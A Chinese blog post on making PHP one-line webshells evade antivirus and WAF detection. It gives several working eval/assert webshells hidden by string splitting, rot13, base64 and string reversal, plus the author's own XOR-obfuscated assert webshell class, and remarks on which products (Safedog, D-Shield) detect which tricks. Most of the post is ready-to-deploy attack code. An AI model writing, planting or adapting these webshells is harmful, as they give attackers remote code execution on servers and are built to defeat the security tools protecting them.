PHP一句话简单免杀
原型
几种已经开源的免杀思路
-
拆解合并
<?php $ch = explode(".","hello.ev.world.a.l"); $c = $ch[1].$ch[3].$ch[4]; //eval $c($_POST[\'x\']); ?>
-
rot13加密
<?php $c=str_rot13(\'n!ff!re!nffreg\'); $str=explode(\'!\',$c)[3]; $str($_POST[\'x\']); ?>
-
rot13+base64
<?php @eval(str_rot13(base64_decode($_POST[\'ant\'])));?>
-
rot13+base64+倒序
<?php @eval(str_rot13(base64_decode(strrev($_POST[\'ant\']))));?>
-
以及自定义蚁剑编码器
-
经过测试安全狗应该没有对流量进行检测,对其就行编码加密即可绕过,D盾着不行,如果对敏感函数进行简单的重定义函数名,D盾会爆1可疑文件
自己写的简单webshell
<?php
class Test{
public $name = \'\';
public $YH_asset; #assert
//assert异或转换
function __construct(){
$_gwp="Y"^"\x38";
$_uDO="}"^"\xe";
$_ZnM="&"^"\x55";
$_UaW="w"^"\x12";
$_rUJ="b"^"\x10";
$_nND="S"^"\x27";
$this->YH_asset=$_gwp.$_uDO.$_ZnM.$_UaW.$_rUJ.$_nND;
}
function __destruct(){
$YH_asset = $this->YH_asset;
//assert(_POST[\'css\']);
@$YH_asset("$this->name");
}
}
$test= new Test();
$c = @$_POST[\'css\'];
$test->name = $c;
?>
结语
方法很多,我觉得这个webshell还是太长了,也没有太过细致的研究,之后有时间应该会继续学习下。
请发表评论